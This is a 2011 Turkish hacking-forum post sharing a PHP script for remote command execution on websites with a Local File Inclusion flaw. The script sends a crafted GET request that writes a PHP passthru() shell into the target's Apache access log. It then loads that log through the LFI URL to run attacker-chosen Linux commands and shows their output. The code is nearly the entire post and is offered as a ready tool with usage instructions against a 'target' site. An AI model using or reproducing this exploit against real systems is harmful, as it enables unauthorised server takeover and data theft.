İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Kisaca Aciklamak Gerekirse ; LFI Açıklı Sitede Linux komutları çalıştırmanızi saglar.

22-11-2011 21:39
#1
berkay88 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2010
Nereden:
İstanbul
Mesajlar:
627
Teşekkür (Etti):
95
Teşekkür (Aldı):
142
Konular:
195
Ticaret:
(0) %
Kisaca Aciklamak Gerekirse ; LFI Açıklı Sitede Linux komutları çalıştırmanızi saglar.

Kod:
<?
$komut = $_POST['komut'];
$site = $_POST['site'];
$site1 = $_POST['site1'];
echo '
<br><h3> Apache Log Enjekte</h3><br>
<font color=blue>
### Kullanım ###<br><br>

örnek :<br>
<br>
site= www.target.com<br>
LFI= http://www.target.com/lfi.php?lfi=../../../../../../apache.log%00<br>
Komut= ls -la<br>
şeklinde girerseniz komut sisteminin sonucunu listeleyecektir <br><br><br><br></FONT>
<form method=post action="">
site:<input type=text name=site1 value="';
echo $site1;
echo '">
LFI:<input type=text name=site value="';
echo $site;
echo '">
Komut:<input type=text name=komut value="';
echo $komut;
echo '">
<input type=submit value="BaQ">';
$komut = $_POST['komut'];
$site = $_POST['site'];
$site1 = $_POST['site1'];
if(isset($site)) {
if(isset($site1)) {
if(isset($komut)) {
$komut1 = urlencode($komut);
$kod = '<t1tl8><? passthru($_GET[****l1]) ?></t1tl8>';
$fp = fsockopen("$site1", 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out = "GET /$kod HTTP/1.1\r\n";
    $out .= "Host: $site1 \r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    fclose($fp);
}
$****l = file_get_contents("$site&****l1=$komut1");
preg_match_all('#<t1tl8>(.*?)</t1tl8>#si', $****l, $sitemis);
foreach(array_unique($sitemis[1]) as $lfi) {
echo "<h4><pre><font color=red>";
echo $lfi;
echo "</font></h4></pre>";
}
}
}
}
?>
Kullanıcı İmzası
Bana Soru SorcaksanTıkla



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı